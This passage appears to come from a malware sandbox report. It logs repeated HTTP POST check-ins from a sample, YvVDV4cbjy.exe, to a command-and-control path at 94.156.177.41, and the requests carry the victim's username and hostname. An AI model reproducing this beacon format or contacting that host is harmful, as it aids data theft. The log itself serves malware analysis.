                            Jan 11, 2025 07:45:29.977284908 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:29 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            69192.168.2.55005094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:30.117988110 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:30.122845888 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:30.838104010 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            70192.168.2.55005194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:30.986568928 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:30.991477966 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:31.709183931 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            71192.168.2.55005294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:31.852391005 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:31.859651089 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:32.578874111 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:32 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            72192.168.2.55005394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:32.736176014 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:32.741029024 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:33.462277889 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:33 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            73192.168.2.55005494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:33.602154970 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:33.607085943 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:34.323070049 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:34 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            74192.168.2.55005594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:34.482917070 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:34.487775087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:35.186527014 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:35 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            75192.168.2.55005694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:35.339809895 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:35.345550060 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:36.073331118 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:35 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            76192.168.2.55005794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:36.519268990 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:36.525051117 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:37.239743948 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            77192.168.2.55005894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:37.395136118 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:37.400062084 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:38.251296997 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:38 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            78192.168.2.55005994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:38.405960083 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:38.410806894 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:39.138231039 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            79192.168.2.55006094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:39.297456026 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:39.302387953 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:40.007410049 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            80192.168.2.55006194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:40.159339905 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:40.165796041 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:40.856905937 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:40 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            81192.168.2.55006294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:41.010130882 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:41.015054941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:41.732707024 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:41 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            82192.168.2.55006394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:42.027710915 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:42.032602072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:42.753599882 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            83192.168.2.55006494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:42.900111914 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:42.904942036 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:43.607815027 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:43 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            84192.168.2.55006594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:43.756759882 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:43.761689901 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:44.450850010 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            85192.168.2.55006694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:44.716214895 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:44.721123934 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:45.428601027 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:45 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            86192.168.2.55006794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:45.585752010 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:45.593770027 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:46.295394897 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            87192.168.2.55006894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:46.445966005 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:46.450872898 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:47.179929018 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:47 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            88192.168.2.55006994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:47.335490942 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:47.341626883 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:48.061913013 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:47 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            89192.168.2.55007094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:48.217773914 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:48.223334074 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
